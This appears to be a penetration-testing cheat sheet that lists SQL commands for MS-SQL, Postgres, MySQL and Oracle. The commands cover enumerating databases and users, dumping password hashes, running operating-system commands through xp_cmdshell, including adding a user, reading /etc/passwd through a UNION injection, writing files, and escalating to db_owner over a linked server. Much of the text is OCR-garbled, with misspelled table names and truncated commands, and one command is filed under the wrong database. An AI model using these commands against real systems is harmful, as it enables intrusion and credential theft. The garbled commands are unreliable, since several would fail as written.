Links
Comment on page

Databases

Database

Ms-sql
Command
Description
SELECT @@version
Database version
EXEC xp_msver
version details
EXEC master..xp_cmdshell 'net user'
Run operating system command
SELECT HOST_NAME()
Get Hostname and IP
SELECT DB_NAME()
Current database
SELECT name FROM master..sysdatabases;
List of databases
SELECT user name()
Current user
SELECT name FROM master .. sjslogins
List of users
SELECT name FROM master..sysobjects WHERE xtype= 'U';
list of tables
SELECT name FROM syscolumns WHERE id=(SELECT id FR0M sysobjects WHERE name- 'mjtable' ) ;
List of columns

Information about all database tables in the system table

SELECT TOP 1 TABLE_NAME FROM INFORMATION SCHEMA.TABLES

List of tables and columns

SELECT name FROM Syscolumns WHERE id
(SELECT id FROM Sysobjects WHERE
name='mytable')

Password hash

SELECT name, password hash FROM master.sys.sgl_logins

Bypass user access level

execute('execute(''alter role [db_owner] add member [client]'') at "compatibility\poo_public"')

Postgres

Command
Explanation
SELECT version();
Database version
SELECT inet server_addr()
Get Hostname and IP
SELECT current database();
Current database
SELECT datname FROM pg database;
List of databases
SELECT user;
Current user
SELECT username FROM pg_user;
List of users
SELECT username,passwd FROM pg shadow
List of password hashes

column list

SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttjpid=T.oid) AND (A.attnum 0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE 'public')

List of tables

SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN
pg catalog.pg namespace n ON n.oid = c.relnamespace WHERE c.relkind IN
( 'r',") AND n.nspname NOT IN ( 'pg catalog', 'pg toast') AND
pg_catalog.pg_table_is_visible(c.oid)

Mysql

Command
Explanation
SELECT @@version;
Database version
SELECT @@hostname;
Get Hostname and IP
SELECT database();
Current database
SELECT distinct (db) FROM mysql.db;
List of databases
SELECT user();
Current user
SELECT user FROM mysql.user;
List of users
SELECT host,user,password FROM mJsql.user;
Password hash list

List of all tables and columns

SELECT table schema, table name, column_name FR0M
information scherna.columns WHERE
table schema != 'mysql' AND table schema != 'information schema'

Execution of operating system command in mysql

osql -S ip , port -U sa -P pwd -Q "exec xp cmdshell `net user /add user
passr

Reading readable files in mysql

UNION ALL SELECT LOAD FILE( '/etc/passwd');

Writing to the file system in mysql

SELECT * FROM mytable INTO dumpfile '/tmp/somefile';

Oracle

Command
Explanation
SELECT * FROM v$version;
Database version
SELECT version FROM v$instance;
Database version
SELECT instance name FROM v$instance;
Current database
SELECT name FROM v$database;
Current database
SELECT DISTINCT owner FROM all_tables;
List of databases
SELECT user FROM dual;
Current user
SELECT username FROM all_users ORDER BY username;
List of users
SELECT column name FROM all_tab_columns;
List of columns
SELECT table name FROM all_tables;
list of tables
SELECT name, password, astatus FROM sys.user$;
List of password hashes

List of databases

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';